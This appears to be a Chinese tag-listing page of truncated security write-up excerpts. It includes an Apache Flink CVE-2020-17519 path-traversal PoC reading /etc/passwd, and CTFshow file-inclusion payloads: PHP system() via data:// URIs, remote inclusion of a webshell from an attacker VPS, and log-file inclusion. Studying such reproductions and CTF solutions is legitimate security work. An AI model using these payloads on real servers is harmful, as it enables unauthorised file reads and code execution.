首页 > TAG信息列表 > 252f
Apache Flink CVE-2020-17518/17519
漏洞简介 Apache Flink是近几年大火的数据处理引擎。受到各大厂商的推崇并且已经应用与实际的业务场景中。很多公司在进行选型的时候都会选择Apache Flink作为选型的对象。Flink核心是一个流式的数据流执行引擎,其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制CTFshow 文件包含
web78 ?file=data://text/plain,<?php system("cat flag.php");?> web 79 ?file=data://text/plain,<?= system("cat flag*");?> web80 hao 方法一:远程文件包含 往VPS下面写马,然后远程包含: ?file=http://118.***.***.***/1.txt 方法二:日志文件包含 ?file=/var/log/n漏洞复现——Apache Flink任意文件读取(CVE-2020-17519)
一、漏洞概述: CVE-2020-17519——Apache Flink 1.11.0中引入的更改(以及1.11.1和1.11.2中也发布)允许攻击者通过JobManager进程的REST接口读取JobManager本地文件系统上的任何文件。 二、影响版本: Apache Flink : 1.11.0-1.11.2 三、环境搭建: 延用CVE-2020-17518的环境(Apache FlinkApache Flink漏洞(CVE-2020-17519)复现
漏洞影响 1.11.0 1.11.1 1.11.2 漏洞复现 poc: /jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd 复现成功截图Apache Flink -任意文件读取漏洞(CVE-2020-17519)
1.漏洞描述 Apache Flink是一个开源流处理框架,具有强大的流处理和批处理功能。 Apache Flink 1.11.0中引入的一项更改(包括版本1.11.1和1.11.2)允许攻击者通过JobManager进程的REST接口读取JobManager本地文件系统上的任何文件。 2.影响版